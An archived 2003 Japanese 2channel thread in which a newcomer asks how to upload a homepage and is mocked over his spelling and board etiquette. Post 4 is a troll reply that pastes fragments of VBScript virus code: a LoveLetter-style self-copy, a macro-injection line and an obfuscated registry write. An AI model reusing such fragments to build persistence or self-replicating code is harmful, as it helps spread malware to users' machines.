2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アップロードについて

1 :レンゾ:03/04/28 15:09 ID:zXSz7BUQ
初めてです。
HTMLでHPらしきものを作れるようにはなったのですが、
設置の仕方がいまいちワカリマセン。
誰か教えてください。

ちなみに私のブロバイダはSo-netです。

2 :レンゾ:03/04/28 15:12 ID:???
>ちなみに私のブロバイダはSo-netです。
うそくさー
「レンゾ@fusianasan」って名前欄に書きなさいよ!
お話にならない

3 :レンゾ:03/04/28 15:12 ID:???
ほほう、ここがウワサのレンゾスレですか?

4 :Name_Not_Found:03/04/28 15:31 ID:???
http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))


5 :Name_Not_Found:03/04/28 16:06 ID:???
単発質問は禁止です。質問スレで聞いてくれ。
ちゃんとルールを読んでね。

それから二度とageないでね。

6 :Name_Not_Found:03/04/28 17:33 ID:???
ブロバイダsage

7 :レンゾ:03/04/28 21:06 ID:Km0Mfo2n
う・・・こんなひどいこと書かれるとは思ってなかった・・・
そりゃ私が悪いかもしれませんが・・・

ブロバイダがSo-netっていうのは本当ですから!
それにレンゾスレって何ですか?
私はここにこのことを書いちゃったこと意外、悪いことをした覚えはありませんが。

8 :Name_Not_Found:03/04/28 21:17 ID:???
                \ │ /
                 / ̄\   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
               ─( ゚ ∀ ゚ )< レンゾレンゾレンゾ!
                 \_/   \_________
                / │ \
                    ∩ ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\∩ ∧ ∧ \( ゚∀゚)< レンゾレンゾレンゾレンゾ〜!
レンゾ〜〜〜〜〜! >( ゚∀゚ )/ |    / \__________
________/ |    〈 |   |
              / /\_」 / /\」
               ̄     / /
                    ̄

9 :Name_Not_Found:03/04/28 21:19 ID:???
>>7
単発質問は禁止です。質問スレで聞いてくれ。日本語分かる?

それからブロバイダって何?聞きなれない言葉だが。

それから二度とageないでね。

10 :Name_Not_Found:03/04/28 21:20 ID:???
ブロバイダブロバイダブロバイダブロバイダブロバイダ
ブロバイダブロバイダブロバイダブロバイダブロバイダ
ブロバイダブロバイダブロバイダブロバイダブロバイダ
ブロバイダブロバイダブロバイダブロバイダブロバイダ

11 :Name_Not_Found:03/04/28 21:22 ID:???
ブロマイド

12 :Name_Not_Found:03/04/28 22:31 ID:???
レンゾたんのちんぽきちゃない

13 :自分なりにストレス発散レス:03/04/28 22:45 ID:???
2ch初心者でスレを立てられる勇気は讃えてヤル。
俺も初めてスレ立てたときはどきどきしたよ。需要があってよかったナぁ。
そして「2chで聞こー」という発想がすばらしい。
聞くより調べるほうが早いんだから多少なりとも(以

14 :【小吉】:03/04/28 22:45 ID:/zBGgcxB
>>7
悪いが2ちゃん初心者か?ほとんどの板に質問スレというのが
あるんだよ。単発での質問はそこで聞くのがルール。鯖の負担になるからだ。
それと
>それにレンゾスレって何ですか?
これはおまいが単発でスレ立て、しかもコテハンを使ってるから
馬鹿にされてんの、分かる?
あと、ちゃんとfusianasan入れな。入れると名前欄にあるとおり、
運勢が出るから。
わざわざageて説明したんだからもうこんなことはするなよ

15 :【末吉】:03/04/28 22:53 ID:Aap5TdYJ
便乗test

16 :Name_Not_Found:03/04/28 23:38 ID:???
>>1
http://pc2.2ch.net/test/read.cgi/hp/1025311158/

17 :Name_Not_Found:03/04/29 06:44 ID:???
暇なんで誰か遊びに来てください。
http://www4.rocketbbs.com/14/bbs.cgi?id=support

18 :Name_Not_Found:03/04/29 10:10 ID:???
>ブロバイダがSo-net
>ブロバイダがSo-net
>ブロバイダがSo-net
>ブロバイダがSo-net
>ブロバイダがSo-net

5 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)